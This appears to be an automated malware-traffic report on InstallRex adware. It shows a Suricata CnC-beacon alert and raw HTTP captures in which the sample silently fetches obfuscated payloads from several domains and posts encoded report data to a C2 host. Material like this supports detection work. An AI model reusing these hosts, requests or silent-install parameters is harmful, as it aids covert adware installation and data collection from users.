hxxp://c1.storesis.com/?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://c1.storesis.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://softwareziip.info/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 54.68.254.5
hxxp://loveshero.net/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 54.68.254.5
hxxp://c1.storesis.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://c1.storesis.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon

Traffic

GET /?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:46 GMT
Content-Type: application/octet-stream
Content-Length: 246135
Connection: close
Content-Disposition: attachment; filename="XwPLangqfnEVNV.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.s....9Z........k....dD..dD......^.$.l.......v.h.^.).U..A...%.3..m.
p.w......g._.g.][email protected]..;.i.~._......t.}.VK.7.o.z.S..2...p.y.Z}.e
.M...'..3...j.E.M<...^.u.V..-...&.J..4...c.y.RQ.)...<.F..(...g.}
.^Q.....1.B..'...y.D.M-.B.P.,....V.z.6....|...|.g.Z$.(...v.G..*...3...
.h.....|....c.^...-..'.][email protected]...>-.l.L. .L..Z.P.`.
T.\2.P...".E..5...l.].Ej.H.4.5.\N.R.N.*....0.V...r..<.8...q.J..!...
&.@.[L...[.9....v.}......y.U.a.'.N..;...w.H..=.I.p.e..c...B.a.T..f....
.V.G(.....m.U..).....R..,...e.m.Q9.o.G.}.2..(.Y.%..../.....'....x.....
..Yh.......Q,.J...(....f.G......v.j.J.r.R..n...v.F.YM...].c.J..z...;.P
.E?...t.}.@2. ...<.\..2.O.h...M". ...a.J..W...o.V.[3.G...p.@..".Y.`
.<..*.....w.40.;...|.... .^.&.6........&....{.`.t.X.Q-.....-....v..
.a.K..u.M.7.2.9..a...}.*..(.Y.%..../.....'....x.......Yd.....{.TA./...
..D..>...a...P\. ...<.N..i...}....*.....q.R..5.....B.]=.....o.N#
.9...~.N..Y...c.k._?.|...>.X..6.L.d.'.I......p.@..".V.n.A..8.....w.
.3.;...r.M..$...-.}.^d.....c.B..,...k.A.Zr...X.6....w.|......z.Z.b. .M
~.:...v.Z..c... ....n.O.t......b.B.j.X.Ev.....~.Qc.......]..-.L.a.z.F1
.$.Q.p.K..4.K.)....f.m.u.-....e...a.^.S ...g.x..d.7.T.z.S..2...|.d..k.
k.V.{.A..o.K.=...37.......D..:...k.^..k.I.5.4.]M.U.M.5....1...~.s..?..
...v.I..2.I.'....d.k.w.#....k...p....".q.w.f."!.:...v.I..0...w.G.XK...
r.r....u.Y.$. .7".W.K. .SO.S.I.i.\..5.\.a.z.B1.$.[.p.K..&...#.C.\I....
.9.R..q...q...] .w.u.`..h.9.....S..~.^. .v.TL.d.\.&....;...d.7.I......
o.K..v.F.#.N..D.\.$....". ...|....6...&.s..?.......L..F...s.Q.Q-..
<<< skipped >>>


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 3756
Cache-Control: no-cache

data=KlKoj7SOOXXPYSUMOQaak&report=LrcYUNeDfGeclBotvqQjOCkHvfmyW35 ilZTgk5s4OurWxUKlGaGFT/gViZ6fU/ KQoqmDHf t0nZE0D7tBm0O4yFkfggJnJY1U2hGE8OeU0sW3FxeAuI7wuIk6u6Z5k5HQe3IOCNv9croWS46/bPFRuTo4COD6JuHAUFQEj8Lplqx5zbWq3kX31JDpnF6 m3AOOiFEFGCZNoAl0yWB8tda57ofh687ARHaIqDsSwINy9Cw7K9ukxIFAlnY9LIjwqhILXO2fCsYPyYizaYtN L/ajGCP1J1zj3fhJQMbIZuoIwEQMZ4gNzrgz6uCBFDBjycb6wgvcLgmwzWvo8FSen1mYXltqtv2XKqb5DtPKUmd8fOaE0IWxE2yh8YzV1m8VRPKpPeDCyKVwK4qC3iF1F CqdEup1JwonXt TsukkoRVDxpr0KOA3zpUT5aXnMzkpeZt/urTinhwKze2MvCDtDgYOuyeyWfkrzw15gigj/qO4CL1dpNodsx9dS1I8yIpwmDzAoNUk FzmI1SF/Z/i2ovWMMGgW5yGaE6W2UQxcTjQyXMa iztypcQX56gntlvsjU7IuP/myFE58vrYns0jrIaSDwIJEQn QcRLyd5IJgAkslSdXbQwPiJ82Cc9TQalGbr9HrbySfTOomzSZVJ1fCmD6St6iFQOLoglBpdRsDfgsklkw3ypKNApvaPnX5d7dBcv4HjmUpAP0 0WGonSoeSJnrtAsvajjwoJQNtuGvNtF2IGyG2K8mBx/Gaa I1rplUsaJNbZSxJt/311vHvCRSUog1HeFd7RcatechXK5DH7NtuPl6KmUcsDna m65l1nJBhDoZKGN8Tx/3Qyp/Mo Qevk1TlAdos9wSNcR/N0anngSE0AMQED fWo0HO3746k7roNaAYC0EBtYj6rFy91Qo75FLcsyp9X5b5pwCJmx1apomL326wDdjwvxfbt7MFoyJjhxNcY214yYZg9l4ooNhMc2CjOQQ/w HuolShQhErKaLj VTRXws3K7qYkYDF6Z mwu56VcA2eND5nr2kNEJZKp7slM0oy7KhHUXffOzxBmaWPscgPUGKjE4xNwIL9/NwLzsoZPfTOEY9NZfg5I2qzLBxh4kU9gZsoQBt3V3eYDcwZkilzEKIkeG8v9C1hxYMuODWs  ZIhdyYPCFpcUsbbEBZPcZUhzMqc8N4JjKbmOZRZwIyQNdgu5lmB6TW2UOBI42r0Y/VvmaxOICqnO 8t7HYallKzwDkFNoYsATz7/VVtIu07
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:30 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:25 GMT
Content-Type: text/html
Content-Length: 9774
Connection: close
Content-Disposition: attachment; filename="3.txt"
..g.v.Y.G.f.M.O.I.J./.u.V.q.p.H.G. .x.R.7./.W.d.9.J.k.0.y.W.x.I.B.y.k.
4.X.F.i.C.x.9.o.9.q.O.M.J.M.9.X.s.o.B.m.n.s.Z.f.M.r.F.B.y.M.3.z.j.1.T.
Y./.H.N.L.B.T.N.B.c.9.m.R.J.t.6.d.c.T.9.9.H.V.M.f.Z.g.o.z.n. .4.3.8.B.
D.z.3.3.n.k.Y.j.r.k.B.s.S.4.X.S.A.h.M.K.T.B.z.j.u.I.u.C.s.M.M.w.d.q.V.
9. .c.T.V.A.5.c.t.s.c.3.s.2.Q.w.F.M.4.p.S.m.G.a.w./.M.C.V.G.4.B.O.h.d.
3.2.M.b.t.i.y.b.j.D.v.k.U.X.u.h.l.Y.m.E.0.t.Y.I.s.L.h.Z.g.e.i.Q.J.O.j.
/.w.b.H.W.H.F.A.R.F.x.P.8.P.E.c.q.m.n.g.q.i.m.9.B.e.I.H.L.r.O.T.3.d.U.
T.E.2.m.k.p.S.e.E.X.U.g.2.T.X.u.D. .L.0.X.V.2.6.N.t.N.i.O.H.N.R.a.N.V.
Z.m.a.X.i.W.8.f.E.b.c.5.o.7.O.X.0.Q.j.u.h./.1.Z.g.X.d.f.i.B.5.z.v.c.l.
H.V.T.5.8.5.E.j.1.W.s.k.i.C.o.s.Q.a.G.R.7.A.m./.4.K.k.W.T.j.l.T.G.A.I.
g.T.X.0.o.R. .0.S.b.Y.c.g.i.Z.N.3.a.f.F.X.d.x.R.K.q.U.I.7.5.5.V.T.c.N.
M.8.u.F.q.P.A. .h.n.X.I.Y.e.7.L.8.I.W.v.T.q.j.L.T.M.v.l.J.U.q.r.S.8.g.
6.d.t.u.9.5.r.K.a.s.y.I.i.5.M.9.x.A.s.e.v.E.O.u.1.I.Q.p.P.y.I.5.s.s.5.
k.s.U.k.d.H.4.9.f.E.N.I.x.U.M.p.1.4.d.f.h.C.3.X.d.z.0.I.s.C.o.4.M.j.Z.
U.d.2.H.U.Y.s.N.x.9.N.I.L.t.U.V.E.a.g.D.r.Q.m.W.N.P.a.H.l.0.U.b.X.O.I.
t.f.l.t.7.f.d.z.V.8.N.l./.t.g.y.V.2.f.z.p.Z.R./.p.4.7.z.t.G.u.I.d.n.l.
E.d.s.U.N.x.b.P.k.2.G.2.d.w.k.N.X.Q.k.M.S.C.R.u.L.K.K.W.6.H.T.Y.U.C.D.
0.0.4.G.A.t.B.F.B.O.i.l.m.J.l.3. . .k.a.r.O. .5.6.o.Q.g. .z.X.F.z.y.W.
U.3.o.4.2.r.N.Q.J.K.r.5.3.n.G.P.U.v.a.e.e.j./.D.M.4.x.e.e.5.3.m.G.L.U.
y.R.X.b.i.V.i.k.B.h.b.W.B.w.S.x.N.w.u.P.u.m.5.h.q.R.2.N.4.n./.I.y.3.7.
r.z.b.v.e.E.2.R.i.g.M.h.f.6.c.e.6.u.J.u.k.L.P.t.V.T.D.8.5.W.B.E.Z.J.C.
O.l.A.K.k.T.o. .f.P.I.j.P.e.U./.N.J.1.n.Z.1.s.c./.S.p.n.P.7.E.8.c.
<<< skipped >>>


GET /?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:16 GMT
Content-Type: text/html
Content-Length: 9746
Connection: close
Content-Disposition: attachment; filename="2.txt"
..U.9. .l.h.C.D.U.1.L.y.X.W.Z.m.u.r.p. .q.L.C.h.s.1.F.x.7.q.j.H.l.f.Q.
c.a. .P./.L.Z.D.T.z.J.Q.G.z.I. .v.l.G.W.K.R.s.j.y.n.h.a.2.N.o.f.C.Z.y.
V.7.z.1.j.W.D.l.y.N.W.N.d.B./.U.y.m.j.i.v.i.y.K.S.u.C.H.g.R.V.2.G.y. .
7.p. .L.y.t.H.n.W.s.e.A.G.q.m./.t.r.M.f.A.j.2.I.s.A.v.q.2.R.b.H.O.8.I.
o.c.h.Q.W.6.M.9.I.C.U.S.H.q.p.t.t.9./.N.7.a.b.0.F.D. .J.p.6.i.t.C.p.c.
h.N. .D.c.S.l.A.b.O.p.O.7.y.s.l.Z.e.j.D.u.j.q.r.r.B.O./.3.L.Z.t. .k.J.
n.q.r.e.r.Z.I.3.p.M.g.J.4.7.3.Z.r.o.s.f.G.8.C.e.T.V.O.Q.Q.A.w.A.1.N.N.
o.i.f.b.n.g.H.4.J.A.p.N.Z.S.S.S.o.Z.F.2.h.t.G.G.a.m.S.F.I.d.C.i.W.9.L.
j.8.B.I.X.2.6.E. .D.i.l.e.0. . .R.M.O.p.k.U.L.R.B.d.e.T.q.D.M.o.F.1.O.
f.m.4.7.7.V.f.t.9.C.5.W.A.S.J.k.g.H.i.V.n.z.w.j.q.g.H.p.8.J.U.g.O.N.L.
8.e.q.V.i.z.L.6.W.W.5./.X.N.M.k.9.w.Q.x.3.0.y.y.A.k.Q.H.m.a.2.E./.4.E.
e.j.H.x.t.9.A.i.t.3.q.9.k.Q.4.R.T.f.J.v.g.F.W.0.g.p.d.7.9.Q.T.L.h.R.c.
k.c.C.S.0.2.A.Y.D.P.i.p.y.4.n.u.o.C.n.l.N.F.O. .2.n.7.c.j.m.4.c.7.9.W.
x.I.H.I.M.5.H.A. .Q.p.T.O.o.7.d.5.g.W.q.V.d.1.L.q.C.5.t.7.Z.r.t.c.6.e.
J. .t.z.J.J.o.F.B.D.g.G.r.U.b.r. ./.H.Z.c.p.v.k.3.6.a.b.p.N.4.w.L.a.C.
B.w.v.1.i.u.N.Y./.P.T.1.B.O.P.r.0.I.4. .b.z.o.H.7.4.5.w.a.n.G.I./.B.6.
f.L.m.D.0.A.Z.y.a.o.y.n.o.n.J.F.X.G.l.c.8.L.I.q.o.Z.X.D.M.o.V.x./.T.S.
8.A.R.z.Q.y.W.Y.V.7.7.X.H.O.J.M.G.s./.7.2.u.y.D.7.H.p.o.N.2.X.M.M.w. .
g.b.F.W.n.t.b.X.B.G.z.0.x.N.Z.q.H.T.n.V.2.F.j.q./.N.g.I.S.3.q.n.U.X.9.
Y.0.g.g.c.b.j.I.g.M.5.3.D.G.C.R.S. .7.a.2.4.8.2.2.A.T.q.E.L.d. .G.o.X.
h.f.3.N.i.I.v.N.f.x.P.W.V.W.V.a.J.G.L.T.m.G.r.4.f.t.j.z.l. .E.5.5.g.v.
B.P.V. .H.8.f.W.i.0.m.x.w.Y.A.q.0.N.j.U.5.w.K.9.J.M.D.u.X.6.K.B./.
<<< skipped >>>


GET /?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: softwareziip.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:27 GMT
Content-Type: application/octet-stream
Content-Length: 450664
Connection: close
Content-Disposition: attachment; filename="Oo8yOHF14wFvBA.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.d...........sUAo....,....d.......kA.\........d..].....&..p........
.../D.N..^...P.A? ....qt...\.....8..hnlX.P..OYt.45.Yi.J..........p.?9.
...\V15..>.............N.>....^..c....Tl..K.<.%.5N.!._O...p.o
a.......b@nV.*Q........o.qm..;..L(.Wp.2-.6..9..c..........t...\;.98.XH
...1.y..Gn..\.o.h.....L.....-.Y........][email protected]%......O.f]..}~..S..Y.
.....@5}.z..........[*.....7b..e..l..Z.u..;....H.=D...Z.aO...5.Q|.....
.#.t..........Y.A.$M7G....{Vrdw.|..n...A.r..n.^Lg...2]...T.5.JJ.D75...
.^(.m..f..|....n._...2U.G..8.. @..2.V.....R."...N.].82.."......3....q.
{.........W.6.u......H..i.!2.s.zF.Q...G...&Z.. ..b..".W,.....V...4..-o
(..?......a...U....WH..../mD.R%jcq......E...Q.m..$H.....[.$1....w*.P..
.?{..O..!B1..MX.C.B..J ...%.s..WQ...B.L..9.....MVF..hA$...r....-'*...\
..k..D.......U....c.....%...\...Y%.h....OtR..0G......;.E...*l..r..h^.=
.....^ .3.=..8l...r....d..(.T.....bR3S.Z.6......rj..u..[.h,),.R..;...d
....H..L.....:t...z..#.|4vW..y..9.Hn.vB...}..o..#.%.....g..d...j.;..r.
(.^....cy....../>..a.<..X.k.......&-..vFw.[;'..'L.*-.O. ........
.....R... .j...g.m...?.efy..g..>....#.......z..pp.*.... ...M'@2.h..
.Pq-]T5.I.V..>.#)<.0...'...T?.....=..U......m.}..?..,..t../.R.=.
.\..%..d.. ..U...[.....l?..F..K.a.z...8n.#..U.[6'....0.`...[.".t..o5..
}[email protected].).|*.Y.
....E.....zP].;..0h{.}.,%(...........f..L.....Qx.....&..|....9.W.$...L
..no..[..3...R.8.......:.5....]..D|. Ht.?....,{..... ....'K_O.QE{.n..r
.....g6|..kh.E5.>:.4......M...] .. .I.\.[.......$....;..d..O.!.
<<< skipped >>>


GET /?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:45 GMT
Content-Type: text/html
Content-Length: 9922
Connection: close
Content-Disposition: attachment; filename="5.txt"
..O.V.v.c.E.m.j.a.u.C.K.F.k.z.3./.X.Z.A.E.M.m.8.2.D.V.9.t.T.M.L.Q.M.d.
O.D.t.u.t.M.L.U.5.7.Q.x.n.4.E.u.B.h.k.z.S.S.B.E.1.7.r.4.I.F.G.X.6.s.b.
i.2.J.2.E.P.i.O.U.a.g.O./.g. .J.Q.v.g.U.A.c.8.u.8.M.Z.p.5.X.r.g.D.k.l.
b.G.x.X.B.l.B.2.u.S.R.k.N.I.7.M.0.T.q././.R.B.R.Q.A.0.I.P.B.G.r.J.D.H.
4.P.p.s.f.C.k.3.2.B./.2.0.l.S./.1.L.b.4.Z.1.j.8.4.f.B.M.L.0./.Q.m.B.X.
R.f.g.L.0.P.U.h.O.Y.x.9.A.Y.7.E.u.V.8.p.8.I.S.Y.0.b.h.V.t.y.G.l.h.3.C.
q.2.a.6.M.U.B. .b. .g.j.9.i.E.E.U.4.E.r.5.C.k.P.b.1. .L.M.q.6.P.5.r.f.
W.S.x.j.z.4.n./.i.N.i.v.6.D.f.X.P.M.9.Z.O.Y.9.2.V.w.i.P.P.t.8.L.6.v.M.
I.i.O.r.0.t.W.6./.i./.3.9.W.s.9.L.c.B.l.4.B.b.O.8.s.u.x.i.F.o.h.Q.8.a.
4.N./.k.j.n. .M. .l.J.S.I.V.I.c.j.A.a.I.X.x.u.o.6.H.Q.3.Y.A.V.X.0.g.O.
O.S.g.z.d.H.Z.i.H.W.O.z.z.x.9.X.E.K.y.B.7.H.y.m.d.8.P.5.i.7.E.2. .E.n.
1.7.4.3.q.V.w.a.K.W.P.g.A.5.c.z.b.B.J.v.A.n.i.G.O.S.T.1.L.y.M.L.J.j.0.
2.h.V. .4.e.u.I.g.M.8.6.o.X.l.a.u.C.B.0.L.g.o.q.b.u.D.f.A.N.W.h.m.R.Z.
Z.5.g.z.F.B.2.4.M.V.w.5.u.m.R.j.E.H.E.0.g.v.f.S.R.R.A.W.U.H.e.r.N.V.e.
2.y.w.1.o.w.z.D.5.S.B.j.M.u.M.e.N.r.P.q.p.Y.5.o./.e.6.T.c.i. .w.h.b.S.
u.m.5.l.0.U.K. .3.X.c.K./.P.m.f.v.Y.g.O.q./.6.r.x.2.q.0.6.3.y.A.M.d.w.
9.F.O.h.B.K.3.j.u.B.z.q.5.y.H.Y.H.A.P. .Q.H.S.y.K.6.s.F.s.7.q.d.o.t.D.
y.s.g.B.Z.e.m.t./.z.Y.7.A.M.d.e.7.n.a.W.v.B.H.J.D.S.5.5.O.u.v.x.n.0.8.
j.S.p.w.X.e.F.X.p.G.j.a.p.F.t.J.e.y.8.X.4.h.V.d.W.S.D.3.C.Q.N.k.L.i.e.
D.T.R.6.6.P.g.l.l.U.m.5.w.4.1.J.L.p.x.m.U.j.f.q.Q.A.R.q.a.S.o.o.H.h.K.
2.r.0.e.j.9.Q.7.p.q.b.W.E.9.r.R.X.f./.o.O.P.8.v.k.q.U.4.M.R.V.A.P.v./.
y.h.J.j.c.k.8.S.S.b.p.K.c.O.A.X.D.X.Y.G.6.B.c.J.h.l.X.e.2.u.w.n.a.
<<< skipped >>>


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 3807
Cache-Control: no-cache

data=iIVyuxWUwnlz0PRJLF4JQ&report=VdXF6KKpvgk8eQltvqQkQlHlVcSxLOfSsfrrHa1w7XOmrJq45pJDC0vfFjauGToKOUB9Om87YsoBHA7GrgHtFTDUjBS2S00q9Vgdf4J/9sqQu3FwVNLfEDtUdsoli3ufqWlCXJIZKgGDC/8wXVRyfDDS408Y tl3Hujp2Gyncogq3ROEfvqdaA1eHfy4F6wv0NDwd1ThdAdgoAihodN zJ7EZAV6U128aFZmQYkegWIOfSJQ1BSV6uzaOP4Ifm/N00BB064qbDTCSru9FvdqC9MGY8ylwSpEEMAhK6xHGAObGPI8IzaLYQX9wqwbchSh0UmY0vLE033oHbwl9bzsFq70Fl8uMp0rtVu3NpctmnFvgMAhx3PWQeBRi1rGFqnBJgZ8eQOcIhGfmxhOIzjExeC2ndmugBioOZ65pDYw03J92lh4Y78Y1fUwiXRjTwBLbxVJnRZY2JgtJrUQNYeAXmJHvFNKRRPJJz8GFoj4v6BQeiQNfD3DPbhFx/IV3x9eX5In12ZVRqRH1YWL6/3hgJU4tIdz7ZksNMVlLxOdHnkeZq5DQnlBnIQ8tAht1mlhcRKMU8bK2z2el3s82LnUHY8ACFZK9Rp/EPDsvlBmKjLKgm5TDhzXY9gtHgvyAtz2CD etNYI6jw9GG9NEGhGOlS9SI82s4bTG4Z6kYVOp4ApTJy/4KH33lDTJsPHlsDtsJTCOS rawUOUkGp/wRbZ1BhU G1npbjxKduXSSwy4hZN8gCtiaRThNzAwHDUshCf83y3Nr8LoDzmUdV6pyidygSWilVwHqmKhJX0JI9V5eOy19lelJw8/fs7kST62nmQ0op7s31RavoH5jO194MHcrOTfYJfUoXARwZHilV9uxbWcRWT6ocZf19h4zkWPMjMWR1FXxJZM7AzZ2 FJYgp6zeAimAw5aJ3 nOdMI1hWp4V2gSsZhAYXdgm3eXVH/g1ECDFc6yPw55QJwRR3tZFluaXs8z9a5tvmg  qxHx3SeibFtYP/MG1ZormIPh5eiGjlTDBEivUMPM uE0TM93J5vENnyXU2Ec4D P33eTS9FOn9xO0b6euAwx5ljDFVQ5tnQAZHAneOE71Mo eay12oI1ScZkybwZHP6SUYz kcBU1jLQWKf3h2OAZlXuw0YapPV6NrsCoYME3iVT2bCa3ORPXskSDXfMZJopmuJ/JF7FSgC3oRoyKw4Z9QuqE6BQyi21lS/rjMC2yxMn6W cKuQkjl0LGDQicF0Tu5Hg2TR37y9dmr5gfXGNPZ
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:32 GMT
Content-Type: text/html
Content-Length: 9710
Connection: close
Content-Disposition: attachment; filename="4.txt"
..e.n.p.4.H.k.g.f.B.P.t.v.e.c.u.h.a.b.k.J.W.P.x.l.m.L.v.Q.Z.c.q.z.u./.
H.o.p.C.O.b.w.0.V.m.c.e.v.0.R.b.h.U.b.R. .9.O.V.S.U.L.t.L.0.j.v. .5.u.
t.6.H.a.5.Q.w.V.U.r.U.y.q.m.G.U.k.A.9.Y.q.D.F.l.c.O.v.i.n.v.X.X.f.N.x.
B.e.c.l.v.5.g.L.3.a.Z.O.F.u.o.X.V.j.E.l.Y.l.R. .K.G.l.o.E.i.O.h.3.E.Z.
A.e.R.B.7.I.p.r.g.j.R.B.k.A.0.x.m.F.J.s.x.R.z.p.O.3.A.t.i.R.r.j.m.S.e.
L.g.7.M.l.W.E.Z.5.I.R.U.v.x.w.h./.1.y.X.b.y.X.p.t.m.T.5.g.n.H.M.h.a.7.
